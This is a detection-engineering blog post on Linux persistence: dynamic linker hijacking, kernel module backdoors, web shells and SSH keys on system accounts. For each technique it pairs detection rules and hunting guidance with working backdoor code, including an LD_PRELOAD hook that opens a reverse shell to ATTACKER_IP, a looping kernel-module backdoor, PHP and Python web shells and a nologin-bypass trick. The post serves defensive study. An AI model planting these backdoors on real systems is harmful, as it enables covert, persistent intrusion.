Linux Detection Engineering - A Continuation on Persistence Mechanisms

Introduction

Welcome to part three of the Linux Persistence Detection Engineering series! In this article, we continue to dig deep into the world of Linux persistence. Building on foundational concepts and techniques explored in the previous publications, this post discusses some additional, creative and/or complex persistence mechanisms.

If you missed the earlier articles, they lay the groundwork by exploring key persistence concepts. You can catch up on them here:

In this publication, we’ll provide insights into:

How each works (theory)
How to set each up (practice)
How to detect them (SIEM and Endpoint rules)
How to hunt for them (ES|QL and OSQuery reference hunts)

To make the process even more engaging, we will be leveraging PANIX, a custom-built Linux persistence tool designed by Ruben Groenewoud of Elastic Security. PANIX allows you to streamline and experiment with Linux persistence setups, making it easy to identify and test detection opportunities.

By the end of this series, you'll have a robust knowledge of common and rare Linux persistence techniques; and you'll understand how to effectively engineer detections for common and advanced adversary capabilities. Are you ready to continue the journey on Linux persistence mechanisms? Let’s dive in!

Setup note

To ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to enable and update our pre-built detection rules. If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and potentially fill any gaps. Now, we are ready to get started.

T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking

The dynamic linker is a critical component of the Linux operating system responsible for loading and linking shared libraries required by dynamically linked executables. When a program is executed, the dynamic linker resolves references to shared libraries, loading them into memory and linking them to the application at runtime. This allows programs to use external libraries, such as the GNU C Library (glibc), without including the library code within the program itself, which saves memory and simplifies updates.

Several key files and paths that play a crucial role in dynamic linking libraries are the following:

Dynamic linker binaries (e.g. ld-linux-x86-64.so.2):
- Typically located in /lib/ or /usr/lib/ for 32-bit systems.
- Found in /lib64/ or /usr/lib64/ on 64-bit systems.
Symbolic links to dynamic linker binaries:
- Typically found in /lib/x86_64-linux-gnu/ or /usr/lib/x86_64-linux-gnu/ for 64-bit systems.
- Typically found in /lib/i386-linux-gnu/ and /usr/lib/i386-linux-gnu/ on 32-bit systems.
Configuration files:
- /etc/ld.so.conf: Specifies additional library paths for the dynamic linker.
- /etc/ld.so.cache: A precompiled cache of library locations generated by ldconfig for efficient resolution.
- /etc/ld.so.preload: Specifies libraries to load before any other libraries.

You can observe the dynamic linker in action using the ldd command, which lists the shared libraries required by an executable and their resolved paths. For example:

> ldd /bin/ls

linux-vdso.so.1 (0x00007fff87480000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f235ff29000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

This output shows the libraries needed by the ls command, along with their locations and the dynamic linker binary responsible for loading them. The dynamic linker itself appears as /lib64/ld-linux-x86-64.so.2 in this case.

When a dynamically linked program is executed, the process follows these steps:

The dynamic linker loads the binary's ELF (Executable and Linkable Format) header to determine the required libraries.
It searches for the specified libraries in paths defined by:
1. Default system library paths.
2. Custom paths specified in /etc/ld.so.conf or environment variables like LD_PRELOAD and LD_LIBRARY_PATH.
It maps the libraries into the program’s memory space and resolves symbols (e.g., function or variable references) required by the program.
Execution is handed over to the program once all dependencies are resolved.

Dynamic Linker Hijacking occurs when an attacker manipulates the linking process to redirect execution flow. This can involve altering the library search order through LD_PRELOAD, modifying configuration files like /etc/ld.so.conf, or tampering with cached library mappings in /etc/ld.so.cache.

Malware such as HiddenWasp, Symbiote, and open-source rootkits such as Medusa and Azazel leverage this technique to establish persistence. MITRE ATT&CK tracks this technique under the identifier T1574.006.

T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

The LD_PRELOAD and LD_LIBRARY_PATH environment variables control how shared libraries are loaded by dynamically linked executables. Both are legitimate tools for debugging, profiling, and customizing application behavior, but they are also susceptible to abuse by attackers seeking to hijack the execution flow.

The LD_PRELOAD variable allows users to specify shared libraries that the dynamic linker should load before any others. This preloading ensures that functions or symbols in the specified libraries override those in standard or program-specified libraries. For instance, LD_PRELOAD is often used to test new implementations of library functions without modifying the application itself. For example:

LD_PRELOAD=/tmp/custom_library.so /bin/ls

In this case, the dynamic linker will load custom_library.so before loading any other libraries required by /bin/ls, effectively replacing or augmenting its behavior. Running ldd this time shows a different output:

> ldd /bin/ls

linux-vdso.so.1 (0x00007fff87480000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f235ff29000)
libcustom.so => /tmp/custom_library.so (0x00007f23ac7e5000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

Indicating that the potentially malicious custom_library.so will be loaded prior to all others.

The LD_LIBRARY_PATH variable specifies directories for the dynamic linker to search when resolving shared libraries. This variable takes precedence over default library paths like /lib/ and /usr/lib/, allowing users to override system libraries with custom versions located in alternate directories:

LD_LIBRARY_PATH=/tmp/custom_libs /bin/ls

Here, the dynamic linker will first search /tmp/custom_libs for the libraries required by /bin/ls. If a library is found there, it will be loaded instead of the default version.

While both LD_PRELOAD and LD_LIBRARY_PATH can hijack the execution flow, they operate differently:

LD_PRELOAD directly specifies libraries to be loaded first, providing precise control over which functions are overridden.
LD_LIBRARY_PATH alters the library search path, potentially affecting multiple libraries and their dependencies.

Environment variables can be set by regular users without requiring administrative access, making them a useful tool to hijack the execution flow without requiring root privileges. Setting environment variables is not persistent. To make the changes persistent across sessions, attackers can append these variables to the shell initialization files such as ~/.bashrc or ~/.zshrc. For example:

> echo 'export LD_PRELOAD=/tmp/malicious_library.so' >> ~/.bashrc
> echo 'export LD_LIBRARY_PATH=/tmp/custom_libs' >> ~/.bashrc

On the next successful login, these variables will automatically be set, ensuring that the specified libraries are loaded whenever a dynamically linked executable is run. For more details, refer to the section on shell profile modification in our previous blog.

With root access, an attacker can edit the /etc/ld.so.conf file or add configuration fragments to /etc/ld.so.conf.d/ to insert malicious library paths. By running ldconfig, they can ensure these libraries are cached and prioritized in the library search order for all users and applications. For example:

# Create a malicious shared library
> mkdir /lib/malicious
> gcc -shared -o /lib/malicious/libhack.so -fPIC /tmp/hack.c
> cp malicious_libc.so /lib/malicious/libc.so.6

# Add the malicious library path to /etc/ld.so.conf and reload
> echo "/lib/malicious" >> /etc/ld.so.conf
> ldconfig

# Verify with ldd
> ldd /bin/ls

linux-vdso.so.1 (0x00007ffd2b1a5000)
libc.so.6 => /lib/malicious/libc.so.6 (0x00007f23ac7e5000) /lib64/ld-linux-x86-64.so.2 (0x00007f23ac6e0000)

This output indicates that the malicious libc.so.6 is now being loaded, hijacking the execution flow of /bin/ls and potentially any other application relying on libc.so.6.

Similarly, an attacker can manipulate the /etc/ld.so.preload file to force the dynamic linker to load a malicious shared library into every dynamically linked executable on the system. Unlike modifying the library search paths in /etc/ld.so.conf, this technique directly injects a library into the execution flow, overriding or augmenting critical functions across all applications. For example:

# Create a malicious shared library
> gcc -shared -o /lib/malicious/libhack.so -fPIC hack.c

# Add the malicious library to /etc/ld.so.preload
> echo "/lib/malicious/libhack.so" >> /etc/ld.so.preload

# Verify with ldd
ldd /bin/ls

linux-vdso.so.1 (0x00007ffd2b1a5000)
libhack.so => /lib/malicious/libhack.so (0x00007f23ac7e5000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

The output shows that libhack.so is loaded before any other libraries. Since /etc/ld.so.preload affects all dynamically linked executables, the attack impacts every user and application.

Additionally, root access allows for more potential attack vectors, such as:

Overwriting legitimate libraries in /lib/, /lib64/, /usr/lib/, or /usr/lib64/ with malicious versions.
Replacing and or modifying the dynamic linker binary (e.g. ld-linux-x86-64.so.2) to introduce backdoors or alter the library resolution process.
Modifying system-wide configuration files such as /etc/profile or /etc/bash.bashrc to globally set LD_PRELOAD or LD_LIBRARY_PATH.

Persistence through T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

Let’s examine how PANIX leverages the dynamic linker hijacking technique within the setup_ld_preload.sh module. This method relies on the presence of various compilation tools on the host system. PANIX hijacks the execution flow of the execve function for a user-specified binary, executing a backgrounded reverse shell whenever the binary is called:

// Function pointer for the original execve
int (*original_execve)(const char *pathname, char *const argv[], char *const envp[]);

// Function to spawn a reverse shell in the background
void spawn_reverse_shell() {
	pid_t pid = fork();
	if (pid == 0) { // Child process
		setsid(); // Start a new session
		char command[256];
		sprintf(command, "/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'", ATTACKER_IP, ATTACKER_PORT);
		execl("/bin/bash", "bash", "-c", command, NULL);
		exit(0); // Exit child process if execl fails
	}
}

// Hooked execve function
int execve(const char *pathname, char *const argv[], char *const envp[]) {
	// Load the original execve function
	if (!original_execve) {
		original_execve = dlsym(RTLD_NEXT, "execve");
		if (!original_execve) {
			exit(1);
		}
	}

	// Check if the executed binary matches the specified binary
	if (strstr(pathname, "$binary") != NULL) {
		// Spawn reverse shell in the background
		spawn_reverse_shell();
	}

	// Call the original execve function
	return original_execve(pathname, argv, envp);
}

To load the malicious shared object, PANIX backdoors the /etc/ld.so.preload by default.

// Compile the shared object
gcc -shared -fPIC -o $preload_lib $preload_source -ldl
if [ $? -ne 0 ]; then
	echo "Compilation failed. Exiting."
	exit 1
fi

// Add to /etc/ld.so.preload for persistence
if ! grep -q "$preload_lib" "$preload_file" 2>/dev/null; then
	echo $preload_lib >> $preload_file
	echo "[+] Backdoor added to /etc/ld.so.preload for persistence."
else
	echo "[!] Backdoor already present in /etc/ld.so.preload."
fi

Let’s run the module:

> sudo ./panix.sh --ld-preload --ip 192.168.1.1 --port 2016 --binary ls

LD_PRELOAD source code created: /tmp/preload/preload_backdoor.c 
LD_PRELOAD shared object compiled successfully: /lib/preload_backdoor.so 
[+] Backdoor added to /etc/ld.so.preload for persistence. 
[+] Execute the binary ls to trigger the reverse shell.

When opening a session, we can see the malicious library injected into the execution flow:

> ldd $(which ls)                                                                      

linux-vdso.so.1 (0x00007ffe00fe8000) /lib/preload_backdoor.so (0x00007f610548e000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f61052bb000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61052b6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f61054a0000)

Executing the ls command will spawn a reverse connection, while executing any other command, such as whoami will not. Let’s analyze the logs in Discover:

We can see PANIX being executed, after which the temporary preload_backdoor.c source code is created in the /tmp directory. Next, gcc is used to compile the source code into a shared object and is added to the /etc/ld.so.preload file, which did not yet exist and is therefore created. After executing the ls binary, the backdoor is triggered, initializing a reverse connection on the specified IP and port.

To detect different activities along the chain, we have the following detection and endpoint rules in place:

Category	Coverage
File	Dynamic Linker Creation or Modification
	Potential Persistence via File Modification
	Shared Object Created or Changed by Previously Unknown Process
	Modification of Dynamic Linker Preload Shared Object
	Creation of Hidden Shared Object File
	Dynamic Linker (ld.so) Creation
Process	Dynamic Linker Copy
	Shared Object Injection via Process Environment Variable
	Unusual Preload Environment Variable Process Execution
Detection and endpoint rules that cover dynamic linker hijacking persistence

To revert any changes made to the system by PANIX, you can use the corresponding revert module by running:

> sudo ./panix.sh --revert ld-preload 

[+] Reverting ld-preload module...
[+] Removing /lib/preload_backdoor.so from /etc/ld.so.preload...
[+] Removed entry from /etc/ld.so.preload.
[+] Removing malicious shared library /lib/preload_backdoor.so...
[+] Removed /lib/preload_backdoor.so.
[+] Removing temporary directory /tmp/preload...
[+] Removed /tmp/preload.
[!] Note: The backdoor may still be active in your current session.
[!] Please restart your shell session to fully disable the backdoor.
[!] Run 'exec bash' to start a new shell session.                                                                       

> exec bash

Hunting for T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

Other than relying on detections, it is important to incorporate threat hunting into your workflow. This publication will solely list the available hunts for each persistence mechanism; however, more details regarding the basics of threat hunting are outlined in the “Hunting for T1053 - scheduled task/job” section of “Linux Detection Engineering - A primer on persistence mechanisms”. Additionally, descriptions and references can be found in our Detection Rules repository, specifically in the Linux hunting subdirectory.

We can hunt for this technique using ES|QL and OSQuery by focusing on the misuse of dynamic linker environment variables like LD_PRELOAD and LD_LIBRARY_PATH. The approach includes monitoring for the following:

Processes with suspicious environment variables: Tracks processes with LD_PRELOAD and LD_LIBRARY_PATH set to unusual values.
Creation of shared object (.so) files: Observes .so files created in non-standard or uncommon directories, which could indicate malicious activity.
Modifications to critical dynamic linker files: Monitors changes to files like /etc/ld.so.preload, /etc/ld.so.conf, and associated directories such as /etc/ld.so.conf.d/.

By combining the Persistence via Dynamic Linker Hijacking hunting rule with the tailored detection queries listed above, analysts can effectively identify and respond to T1574.006.

T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions

Loadable Kernel Modules (LKMs) provide a way to extend kernel functionality without modifying the core kernel itself. These modules can be dynamically loaded and unloaded at runtime, enabling features like hardware driver support, network protocol handling, and file system management.

Modules are typically stored in the /lib/modules/ or /usr/lib/modules/ directory followed by a subdirectory for the active kernel version and are organized into subdirectories based on their functionality, such as drivers or network protocols. To ensure an LKM is loaded on boot, the following configuration files are read:

/etc/modules
/etc/modprobe.d/
/usr/lib/modprobe.d/
/etc/modules-load.d/
/run/modules-load.d/
/usr/local/lib/modules-load.d/
/usr/lib/modules-load.d/

Management tools like modprobe, insmod, and rmmod are used to load, list, or unload modules.

When an LKM is loaded, the following sequence occurs:

User-space invocation:
a. A user with sufficient privileges initiates the loading process using tools like modprobe or insmod.
Syscall invocation:
a. init_module(): Loads a module from memory.
b. finit_module(): Loads a module from a file descriptor.
Kernel validation:
a. The kernel verifies the module's integrity, structure, and compatibility.
b. Checks include validation of the ELF format and kernel version compatibility using metadata like vermagic.
Dependency Resolution:
a. Tools like depmod generate dependency files that modprobe uses to load any required modules.
Initialization and integration:
a. The module's initialization function is executed, integrating it with the kernel's functionality through exported symbols and interfaces.

Newer systems leverage systemd to invoke module loading during startup based on unit dependencies specified in service files. Older systems may still use scripts in /etc/init.d/ or /etc/rc.d/ to load modules at boot.

The kernel prioritizes modules based on their order in dependency files or init system configurations. The search and load process typically follows:

Default paths specified in /lib/modules/ or /usr/lib/modules/
Overrides defined in /etc/modprobe.d/ or /usr/lib/modeprobe.d/
Kernel command-line parameters (e.g., modprobe.blacklist).

The flexibility and power of LKMs make them a double-edged sword, as they are not only indispensable for system functionality but also a potential vector for sophisticated threats, such as rootkits. MITRE tracks this technique under T1547.006.

T1014 - Rootkit

Rootkits are a class of malicious software designed to conceal their presence and maintain persistent access to a system. They operate at various levels, from user-space applications to kernel-level modules. Kernel-level rootkits leverage LKMs, manipulating kernel behavior to hide processes, files, and network activity, making them difficult to detect.

While rootkits are a broad and advanced topic, they are closely related to T1547.006 - Kernel Modules and Extensions. By modifying kernel structures or intercepting system calls, these rootkits can gain deep control over the system while remaining hidden from standard detection methods. MITRE tracks Rootkits specifically under T1014.

Future Work: T1014 - Rootkit

Rootkits are a vast topic deserving dedicated attention. In upcoming publications, we will explore:

The basics of rootkits.
Techniques for detecting and hunting rootkits.
Real-world examples of rootkit attacks and defenses.

For now, understanding how LKMs are used as a vector for kernel rootkits bridges the gap between T1547.006 - Kernel Modules and Extensions and the broader topic of rootkits. This blog lays the groundwork for the in-depth exploration of rootkits to come.

Can’t wait to learn more about rootkits? Read our recent research, “Declawing PUMAKIT”, a sophisticated LKM rootkit that employs mechanisms to hide its presence and maintain communication with its C2 servers.

Persistence through T1547.006 - Kernel Modules and Extensions

While T1547.006 and T1014 share some overlap, PANIX includes two distinct modules: one for a basic LKM and another for a fully implemented rootkit. We’ll begin with the simple LKM using the setup_lkm.sh module for T1547. As before, this module requires kernel headers and compilation tools to be available on the host.

The LKM being created is a simple module that spawns a separate thread to execute a specified command. Once the command is executed, the thread enters a sleep state for 60 seconds before repeating the process in an infinite while loop.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/kthread.h>
#include <linux/delay.h>
#include <linux/signal.h>

static struct task_struct *task;

static int backdoor_thread(void *arg) {
	allow_signal(SIGKILL);
	while (!kthread_should_stop()) {
		char *argv[] = {$command};
		call_usermodehelper(argv[0], argv, NULL, UMH_WAIT_PROC);
		ssleep(60);
	}
	return 0;
}

static int __init lkm_backdoor_init(void) {
	printk(KERN_INFO "Loading LKM backdoor module\\n");
	task = kthread_run(backdoor_thread, NULL, "lkm_backdoor_thread");
	return 0;
}

static void __exit lkm_backdoor_exit(void) {
	printk(KERN_INFO "Removing LKM backdoor module\\n");
	if (task) {
		kthread_stop(task);
	}
}

module_init(lkm_backdoor_init);
module_exit(lkm_backdoor_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("PANIX");
MODULE_DESCRIPTION("LKM Backdoor");

After compilation with make and gcc, it copies the LKM to /lib/modules/$(uname -r)/kernel/drivers/${lkm_name}.ko and executes the sudo insmod ${lkm_destination} to load the module. The $(uname -r) command ensures that the path corresponding to the active kernel version is resolved.

Let’s run the module:

> sudo ./panix.sh --lkm --default --ip 192.168.1.1 --port 2017

[+] Kernel module source code created: /tmp/lkm/panix.c
[+] Makefile created: /tmp/lkm/Makefile 
[+] Kernel module compiled successfully: /lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko
[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/...
[+] Kernel module loaded successfully. Check dmesg for the output.
[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
[+] LKM backdoor established!

Taking a look at the remnants left behind in Discover, we can see:

PANIX is executed, initiating the compilation process for the LKM using make, ensuring it is built for the active kernel version. Once compiled, the resulting panix.ko module is placed in the appropriate module library directory for the current kernel. To achieve persistence across reboots, a configuration file named panix.conf is created in both /etc/modules-load.d/ and /usr/lib/modules-load.d/. The module is then loaded into the kernel using the insmod command, activating the reverse shell. Leveraging the Auditd Manager integration, we can observe the kmod utility loading the panix kernel module.

This technique can leave behind several traces. The following detection- and endpoint rules are in place to effectively detect these:

Category	Coverage
Driver	Kernel Driver Load
	Kernel Driver Load by non-root User
File	Loadable Kernel Module Configuration File Creation
	Kernel Object File Creation
Process	Kernel Module Load via insmod
	Kernel Module Removal
	Enumeration of Kernel Modules
	Attempt to Clear Kernel Ring Buffer
	Kernel Load or Unload via Kexec Detected
Syslog	Tainted Kernel Module Load
	Tainted Out-Of-Tree Kernel Module Load
Detection and endpoint rules that cover loadable kernel module persistence

For more information on how to set up the Auditd Manager integration to capture driver events and much more, check out the Linux Detection Engineering with Auditd publication.

We can revert this module by executing the following command:

> sudo ./panix.sh --revert lkm

###### [+] Reverting lkm module... #####

[+] Unloading kernel module 'panix'...
[+] Kernel module 'panix' unloaded successfully.
[+] Removing kernel module file '/lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko'...
[+] Kernel module file '/lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko' removed successfully.
[+] Removing temporary directory '/tmp/lkm'...
[+] Temporary directory '/tmp/lkm' removed successfully.
[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/...
[+] Updating module dependencies...
[+] Module dependencies updated.

Hunting for T1547.006 - Kernel Modules and Extensions

We can hunt for this technique using ES|QL and OSQuery, focusing on suspicious kernel module activity, including the creation of .ko files, execution of kernel module management tools, and modifications to kernel module configuration files. The hunting approach includes:

Monitoring kernel module file creation: Tracks .ko file creations in non-standard directories to detect potentially malicious modules.
Identifying unusual module management executions: Monitors processes such as kmod, modprobe, insmod, and rmmod for suspicious or uncommon arguments.
Detecting changes to configuration files: Observes files like /etc/modprobe.d/, /etc/modules, and related directories for modifications that might enable persistence.
Focus on rare drivers: Use queries that identify kernel modules loaded via init_module or finit_module syscalls that occur infrequently.

By combining the Persistence via Loadable Kernel Modules and Drivers Load with Low Occurrence Frequency hunting rules, along with tailored detection queries, analysts can effectively identify T1547.006-related activity.

T1505.003 - Server Software Component: Web Shell

A web shell is a malicious script uploaded to a web server, enabling attackers to execute arbitrary commands on the host. They are commonly deployed after exploiting vulnerabilities in server software, weak file upload restrictions, or misconfigurations. Web shells are typically small scripts written in commonly supported languages such as PHP, Python, or Perl. This activity is tracked by MITRE under T1505.003.

T1505.003 - Web Shell - PHP & Python

Web shells often integrate seamlessly with web server configurations like Apache, Nginx, or Lighttpd. These scripts can be categorized into two primary types: command execution (CMD) and reverse shell web shells.

1. Command shells

CMD web shells provide a simple interface to execute system commands through a browser or remote tool. A typical PHP CMD web shell might look like this:

<?php
if (isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd']);
}
?>

2. Reverse shells

Reverse shell web shells establish an outbound connection from the compromised server to the attacker’s machine. An example PHP reverse shell:

<?php
$ip = '192.168.1.100'; // Attacker IP
$port = 4444;          // Attacker Port
$socket = fsockopen($ip, $port);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

The attacker runs a listener on their machine using Netcat or any other listener. When the shell script is accessed, it connects to the attacker, providing an interactive session.

Leveraging the Common Gateway Interface (CGI) for web shells

The Common Gateway Interface (CGI) allows web servers to execute external scripts and return their output to clients. Attackers can use CGI scripts to execute commands in various languages, including Python, Bash, and Perl. A Python CGI web shell example:

#!/usr/bin/env python3
import cgi
import os

print("Content-type: text/html\n\n")
form = cgi.FieldStorage()
command = form.getvalue("cmd")
if command:
    output = os.popen(command).read()
    print(output)

CGI scripts offer versatility and can be used in environments where PHP or other web shells might be restricted.

Attackers often target web root directories like /var/www/html/ to upload their web shells. Weak file upload restrictions or misconfigured permissions allow them to place malicious scripts. To enhance persistence, attackers may:

Embed Web Shells in Existing Files: Modify legitimate files to include web shell code, making detection more challenging.
Use Built-in Web Servers: Attackers can start a web server in a specific directory to bypass restrictions
Leverage Hidden Directories: To avoid detection, locate web shells in obscure or hidden directories.

Although this type of implementation is also possible for languages other than PHP and Python, they commonly require modules/plugins to be installed, making them a less viable option. The following section will explore detailed examples of these methods and their corresponding detection strategies.

Persistence through T1505.003 - Web Shell: PHP & Python

Let’s examine how PANIX leverages PHP, Python, and CGI to establish web shell backdoors within the setup_web_shell.sh module. Refer to the module to inspect the full payloads.

Depending on permissions, PANIX creates a web server in /var/www/html/ (root) or $HOME/ (non-root). PHP uses the -S flag to start a lightweight server, with -t specifying the root directory to serve the web shells. For Python, the -m http.server module is combined with --cgi to enable dynamic execution of CGI scripts. If only Python 2 is available, PANIX falls back to -m CGIHTTPServer for compatibility.

Servers are launched in the background using nohup to ensure persistence, remaining active even after the user logs out.

Let’s look at what traces we can detect within these chains, starting with a PHP CMD shell. To simulate this activity, we can use the following PANIX command:

> ./panix.sh --web-shell --language php --mechanism cmd --port 8080

[+] Web server directory created at /home/ruben/panix/
[+] cmd.php file created in /home/ruben/panix/
[+] Interact via: curl http://<ip>:8080/cmd.php?cmd=whoami
[!] Starting PHP server on port 8080...
[+] PHP server running in the background at port 8080.
[!] In case you cannot connect, ensure your firewall settings are allowing inbound traffic on port 8080.

Run the following commands in case of issues on RHEL/CentOS systems:

sudo firewall-cmd --add-port=8080/tcp --permanent
sudo firewall-cmd --reload

After execution, we can call the cmd.php through the following curl command:

> curl http://192.168.1.100:8080/cmd.php?cmd=whoami
ruben

Executing the payload generates the following documents in Kibana:

The figure above shows PANIX being executed and the /home/ruben/panix/ directory being created (as PANIX is executed with user privileges). The cmd.php file is created, and the PHP web shell is spawned with the -S flag and listens on all interfaces (0.0.0.0) on port 8080. Upon execution of the curl command from the attack host, we can see a connection_accepted, followed by the execution of the whoami command, followed by a disconnect_received.

To simulate reverse shell behavior, we can simulate a Python reverse shell through the following PANIX command:

./panix.sh --web-shell --language python --mechanism reverse --port 8080 --rev-port 2018 --ip 192.168.1.100

[+] Web server directory created at /home/ruben/panix/
[+] reverse.py file created in /home/ruben/panix/cgi-bin/
[+] Interact via: curl http://<ip>:8080/cgi-bin/reverse.py
[!] Starting Python3 server on port 8080 with CGI enabled...
[+] Python3 server running in the background at port 8080.
[!] In case you cannot connect, ensure your firewall settings are allowing inbound traffic on port 8080.

Run the following commands in case of issues on RHEL/CentOS systems:

sudo firewall-cmd --add-port=8080/tcp --permanent
sudo firewall-cmd --reload

After which, we can communicate with the reverse shell from the attacker machine through the following commands:

// Terminal 1
> curl http://192.168.1.100:8080/cgi-bin/reverse.py

// Terminal 2
> nc -nvlp 2018
listening on [any] 2018 ...
connect to [192.168.211.131] from (UNKNOWN) [192.168.211.151] 47250
> whoami
ruben

This module generates the following documents:

After PANIX executes, we can see /home/ruben/panix/cgi-bin/reverse.py being created and execution permissions being granted. A python3 web server with CGI support is spawned. After executing the curl command from the attacker machine, we can see an incoming connection through the connection_accepted event, followed by the execution of the reverse shell command, leading to the call back to the attacker machine through the connection_attempted event. A fully interactive shell is obtained once the attacker catches the reverse connection.

You can revert the changes made by PANIX by running the following revert command:

> ./panix.sh --revert web-shell

###### [+] Reverting web-shell module... #####

[+] Running as non-root. Reverting web shell for user 'ruben'.
[+] Reverting web shell for user 'ruben' at: /home/ruben/panix/
[+] Identifying web server processes serving /home/ruben/panix/...
[+] Killed process 11592 serving /home/ruben/panix/.
[+] Removed web server directory: /home/ruben/panix/

After which, all artifacts should be cleaned.

Let’s take a look at the coverage:

Category	Coverage
File	Suspicious File Creation via Web Server
Process	File Downloaded from Suspicious Source by Web Server
	File Downloaded and Piped to Interpreter by Web Server
	Suspicious Download and Redirect by Web Server
	Web Server Spawned via Python
	Simple HTTP Web Server Creation
	Potential Remote Code Execution via Web Server
	File Downloaded to Suspicious Location by Web Server
	Decode Activity via Web Server
	Unusual Command Executed by Web Server
Network	Reverse Shell Executed via Web Server
	Simple HTTP Web Server Connection
Detection and endpoint rules that cover web shell persistence

Hunting for T1505.003 - Web Shell

We can hunt for this technique using ES|QL and OSQuery by focusing on suspicious file creation events and anomalous network activity commonly associated with web shells. The approach includes monitoring for the following:

Creation or renaming of web shell files: Tracks files with extensions such as .php, .py, .pl, .rb, .lua, and .jsp in unexpected or uncommon locations, which may indicate the deployment of a web shell.
Anomalous network activity by scripting engines: Observes disconnect events and unusual connections initiated by processes like python, php, or perl, particularly connections to external IP addresses.
Low-frequency external connections: Detects rare or low-volume network connections from processes, especially those initiated by root or unique agents, which can indicate malicious web shell activity.

By combining the Persistence via Web Shell, Persistence Through Reverse/Bind Shells, and Low Volume External Network Connections from Process by Unique Agent hunting rules with the tailored detection queries listed above, analysts can effectively detect and respond to T1505.003.

T1098.004 - Account Manipulation: SSH Authorized Keys

SSH's authorized_keys feature is a common target for attackers aiming to establish persistent access to compromised Linux systems. By placing their public keys in the authorized_keys file, attackers can gain access without requiring further authentication if the private key is in their possession. This mechanism is controlled by files like .ssh/authorized_keys or .ssh/authorized_keys2, typically in the user’s home directory. While this persistence method is well-documented, we explored its nuances in detail in a previous article.

In this section, we will focus on a less conventional but intriguing variation of this technique: abusing system accounts that by default are rarely used and have default configurations. This approach leverages the default home directories of these users to create .ssh directories and insert authorized_keys files, enabling SSH-based persistence under these accounts. Exatrack’s research on a new variant of the perfctl malware recently explored this technique. Although this specific variation of the authorized keys persistence technique is not tracked by MITRE, the overall persistence technique is tracked under T1098.004.

T1098.004 - SSH Authorized Keys: System User Backdoors

System accounts like news or nobody often exist on default Linux installations with non-interactive shells (e.g., /usr/sbin/nologin) and predefined home directories. These accounts, typically overlooked and not intended for direct login, can become attractive targets for attackers. We can observe their configurations in the /etc/passwd file:

> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

As we can see, the root user's home directory is /root/, while system users like news, backup, and nobody also have default home directories, such as /var/spool/news/ and /nonexistent/. The default shell for root is /bin/bash, whereas system users are restricted by /usr/sbin/nologin.

Although system users are intended to be non-interactive, attackers can exploit their configurations by creating .ssh directories in their home directories and adding authorized_keys files for SSH-based authentication. By manipulating the /etc/passwd file and shell configuration, attackers can bypass restrictions imposed by /usr/sbin/nologin and gain access. The next section will explore this technique in detail, including the steps attackers use to execute it.

Persistence through T1098.004 - SSH Authorized Keys: Backdoored System Users

Let’s examine how the PANIX setup_backdoor_system_user.sh module abuses this trick to leverage non-interactive system accounts to gain SSH access onto a target without creating a new user. Refer to the module to inspect the full payloads.

The first step is to identify a system user as the target for the attack. For example, as we know:

The news user has /var/spool/news/ as its home directory.
The nobody user has /nonexistent/ by default (which can be created).

The next step is to create the .ssh directory within the home directory and writes the attacker’s public key to the authorized_keys file, and ensure the correct file permissions:

# Create the .ssh directory
mkdir -p "$home_dir/.ssh"
chmod 755 "$home_dir/.ssh"  # Set directory permissions to be accessible by others

# Write the public key to authorized_keys
echo "$key" > "$home_dir/.ssh/authorized_keys"
chmod 644 "$home_dir/.ssh/authorized_keys"  # Set file permissions to be readable by others

This step ensures that the attacker can authenticate via SSH using their private key. The next step is to modify the shell. By default, system users like news and nobody are configured with /usr/sbin/nologin as their shell, which prevents interactive login sessions. We need to circumvent this restriction by:

Copying (for example) /bin/dash to /usr/sbin/nologin (with a trailing space).
Updating /etc/passwd to include the modified shell path.

# Copy /bin/dash to '/usr/sbin/nologin '
cp /bin/dash "/usr/sbin/nologin "

# Modify /etc/passwd to include the trailing space in the shell path
local username=$(echo "$user_entry" | cut -d: -f1)
sed -i "/^$username:/s|:/usr/sbin/nologin$|:/usr/sbin/nologin |" /etc/passwd

Where the local username variable can be set to any system user. This subtle manipulation tricks the system into treating /usr/sbin/nologin (with a trailing space) as a valid shell.

Finally, to ensure SSH accepts the modified shell as valid, we need to add nologin (with a trailing space) to /etc/shells:

# Check and add "nologin " to /etc/shells if not already present
if ! grep -q "nologin " /etc/shells; then
    echo "nologin " >> /etc/shells
    echo "[+] Added 'nologin ' to /etc/shells"
else
    echo "[+] 'nologin ' already exists in /etc/shells. Skipping."
fi

This step ensures SSH does not reject login attempts due to the manipulated shell. Now that we understand the flow, let’s run the module.

> sudo ./panix.sh --backdoor-system-user --default --key <ssh-rsa public key>

[+] Added 'nologin ' to /etc/shells
